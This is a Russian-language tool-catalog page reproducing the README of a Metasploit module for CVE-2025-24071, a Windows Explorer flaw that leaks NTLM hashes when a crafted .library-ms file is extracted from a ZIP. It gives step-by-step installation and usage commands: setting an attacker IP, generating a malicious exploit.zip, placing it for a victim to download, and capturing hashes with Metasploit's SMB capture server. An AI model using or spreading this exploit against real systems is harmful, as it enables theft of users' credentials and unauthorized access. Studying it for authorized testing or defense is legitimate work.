Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24071-msfvenom — Модуль Metasploit для CVE-2025-24071 - утечка NTLM-хэша Windows через .library-ms | Kitploit
Инструменты/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
Фреймворки для эксплойтовАтаки на ПаролиГенерация полезной нагрузкиАнализ уязвимостейЭксплуатация
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

Модуль Metasploit для CVE-2025-24071 - утечка NTLM-хэша Windows через .library-ms

Репозиторий
2551 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24071: утечка NTLM-хэша через файл .library-ms (модуль Metasploit)

Этот репозиторий содержит модуль Metasploit для эксплуатации CVE-2025-24071 — уязвимости в Проводнике Windows, которая приводит к утечке NTLM-хэшей при извлечении вредоносного файла .library-ms из ZIP-архива.

Разработано: FOLKS-IWD


Обзор

Уязвимость возникает, когда пользователь извлекает ZIP-архив, содержащий специально созданный файл .library-ms. Проводник Windows автоматически инициирует запрос аутентификации SMB к удалённому серверу, указанному в файле, что приводит к утечке NTLM-хэша пользователя без какого-либо взаимодействия с ним.

Этот модуль Metasploit:

  1. Генерирует вредоносный файл .library-ms.
  2. Упаковывает его в ZIP-архив.
  3. Интегрируется с функцией перехвата SMB в Metasploit для сбора NTLM-хэшей. image

Установка

  1. Склонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Скопируйте модуль в каталог модулей Metasploit:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Использование

  1. Загрузите модуль:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Задайте необходимые параметры:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Запустите модуль :
root@kitploit:~
  run
  1. Модуль создаст вредоносный ZIP-файл (exploit.zip). Разместите этот файл так, чтобы жертва могла скачать и извлечь его.
  2. Используйте модуль перехвата SMB в Metasploit для сбора NTLM-хэшей:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Скачать инструмент